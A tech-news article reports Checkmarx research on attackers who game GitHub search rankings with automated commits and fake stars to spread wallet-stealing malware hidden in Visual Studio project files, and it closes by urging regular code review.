Hackers manipulated GitHub’s search functionality and used meticulously crafted repositories to distribute malware.
A favorite playground for developers, the GitHub collaborative platform is a must. However, although it has recently been made more secure thanks to the introduction of passkeys to replace passwords, Checkmarx researchers are warning its users against a serious attempt to distribute malware.
They found that hackers are manipulating GitHub search results to deliver persistent malware to developers’ systems. By creating malicious repositories with popular names and topics, cybercriminals exploit GitHub features to reach a large audience.
Bring up corrupted repositories in the GitHub search engine
The attackers behind this campaign use sophisticated techniques to improve the ranking of their malicious repositories in search results. One way is to use GitHub Actions to automatically update repositories at a very high frequency. They edit a file, usually called a “log”, with the current date and time, or just a small random change. This ongoing activity artificially increases the visibility of repositories, especially in cases where users filter their results by the most recently updated ones. This increases the likelihood that unsuspecting users will find and access these repositories.
In addition to these automatic updates, hackers perform another technique to amplify the efficiency of their repository and achieve the best results. They use multiple fake accounts to add fake stars to their repositories, to give a feeling of popularity and trustworthiness. Finally, to evade detection, they hid the malicious code in the Visual Studio project files (.csproj or .vcxproj), which is automatically executed when the project is created.
Maintain malware persistence with a scheduled task
Researchers have noticed that the payload of these malware is delivered based on the victim’s origin. In the recent campaign, hackers used a large executable file that shares similarities with the “Keyzetsu clipper” malware, known for targeting crypto wallets. On April 3, 2024, the attacker updated the code in one of their repositories by linking to a new URL that downloads another “.7z” encrypted file. The archive contained an executable named feedbackAPI.exe.
To artificially increase the file size and exceed the limit of various security solutions, including VirusTotal, hackers padded the executable with many zeros, making it impossible to scan. The malware maintains persistence by creating a scheduled task that launches the executable every day at 4 a.m. without user confirmation. This use of malicious GitHub repositories to distribute malware is a real blight on the open source ecosystem.
From now on, it seems that simply checking for known vulnerabilities is no longer enough, and that regular code review is necessary to lock down open source platforms for good, which are, as we know, not necessarily the most secure.
Sources: Security Affairs, Checkmarx
0